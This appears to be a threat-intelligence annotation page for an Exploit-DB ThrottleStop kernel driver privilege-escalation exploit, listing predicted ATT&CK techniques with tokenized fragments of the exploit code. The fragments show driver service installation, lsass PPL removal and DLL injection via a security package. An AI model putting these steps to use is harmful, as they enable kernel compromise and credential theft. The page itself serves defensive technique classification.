← All stories

Exploit-DB

[local] Throttlestop Kernel Driver - Kernel Out-of-Bounds Write Privilege Escalation

2026-04-22 · Read original ↗

ATT&CK techniques detected

12 predictions

T1068Exploitation for Privilege Escalation

99%

“[ local ] throttlestop kernel driver - kernel out - of - bounds write privilege escalation throttlestop kernel driver - kernel out - of - bounds write privilege escalation # exploit title : throttlestop kernel driver - kernel out - of - bounds write privilege escalation # exploit…”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1003.001LSASS Memory

95%

“searchprocesspid = xread ( hdrv, ( uint64 _ t ) searcheprocess + 0x2e0 ) ; / / + 0x2e0 uniqueprocessid : ptr64 void if ( searchprocesspid = = lsasspid ) / / lsass process { break ; } } printf ( " [ + ] found lsass eprocess! \ n " ) ; printf ( " [ + ] removing ppl protection... \ …”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1055.001Dynamic-link Library Injection

89%

“##el : uchar printf ( " [ + ] lsass protections disabled \ n " ) ; closehandle ( hdrv ) ; security _ package _ options spo = { } ; security _ status ss = addsecuritypackagea ( ( lpstr ) " c : \ \ windows \ \ system32 \ \ ntssp. dll ", & spo ) ; printf ( " [ + ] dll injection succ…”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1055.001Dynamic-link Library Injection

81%

“##ror ( ) ) ; } else { printf ( " [ + ] service started correctly. \ n " ) ; } lpvoid nt _ base = getbaseaddr ( l " ntoskrnl. exe " ) ; printf ( " [ + ] nt base : % p \ n ", nt _ base ) ; handle hdrv = null ; hdrv = createfilea ( " \ \ \ \. \ \ throttlestop ", ( generic _ read | …”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1543.003Windows Service

78%

“! ] error opening scm : % lu \ n ", getlasterror ( ) ) ; return 1 ; } / / create the service hservice = createservice ( hscmanager, l " throttlestop ", l " throttlestop ", service _ all _ access, service _ kernel _ driver, service _ auto _ start, service _ error _ normal, l " c :…”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1569.002Service Execution

74%

“! ] error opening scm : % lu \ n ", getlasterror ( ) ) ; return 1 ; } / / create the service hservice = createservice ( hscmanager, l " throttlestop ", l " throttlestop ", service _ all _ access, service _ kernel _ driver, service _ auto _ start, service _ error _ normal, l " c :…”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1055.001Dynamic-link Library Injection

66%

“searchprocesspid = xread ( hdrv, ( uint64 _ t ) searcheprocess + 0x2e0 ) ; / / + 0x2e0 uniqueprocessid : ptr64 void if ( searchprocesspid = = lsasspid ) / / lsass process { break ; } } printf ( " [ + ] found lsass eprocess! \ n " ) ; printf ( " [ + ] removing ppl protection... \ …”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1057Process Discovery

54%

“0x % llx \ n ", ok, br, getlasterror ( ), ( unsigned long long ) out ) ; if ( ok & & br = = 8 & & out ) { ulonglong result = * ( volatile ulonglong * ) ( uintptr _ t ) out ; / / 8 bytes exactos } / / write printf ( " [ + ] write what : 0x % 016llx | where : 0x % 016llx \ n ", ( u…”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1057Process Discovery

48%

“##rocess = ulonglong ( nt _ base ) + 0x5412e0 ; dword64 eprocess = xread ( hdrv, ( uint64 _ t ) system _ eprocess ) ; printf ( " [ + ] eprocess : 0x % llx \ n ", eprocess ) ; dword64 currentprocesspid = xread ( hdrv, ( uint64 _ t ) system _ eprocess + 0x2e0 ) ; / / + 0x2e0 unique…”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1003.001LSASS Memory

48%

“sizeof ( processentry32w ) ; if ( process32firstw ( snapshot, & entry ) ) { do { if (! _ wcsicmp ( entry. szexefile, processname. c _ str ( ) ) ) { processid = entry. th32processid ; break ; } } while ( process32nextw ( snapshot, & entry ) ) ; } closehandle ( snapshot ) ; return …”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1055.001Dynamic-link Library Injection

42%

“##rocess = ulonglong ( nt _ base ) + 0x5412e0 ; dword64 eprocess = xread ( hdrv, ( uint64 _ t ) system _ eprocess ) ; printf ( " [ + ] eprocess : 0x % llx \ n ", eprocess ) ; dword64 currentprocesspid = xread ( hdrv, ( uint64 _ t ) system _ eprocess + 0x2e0 ) ; / / + 0x2e0 unique…”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

T1055.001Dynamic-link Library Injection

35%

“sizeof ( processentry32w ) ; if ( process32firstw ( snapshot, & entry ) ) { do { if (! _ wcsicmp ( entry. szexefile, processname. c _ str ( ) ) ) { processid = entry. th32processid ; break ; } } while ( process32nextw ( snapshot, & entry ) ) ; } closehandle ( snapshot ) ; return …”

Which technique(s) should be tagged here? Pick zero or more — leaving blank just records that the original was wrong.

No matches for .

Loading techniques…

Summary

Throttlestop Kernel Driver - Kernel Out-of-Bounds Write Privilege Escalation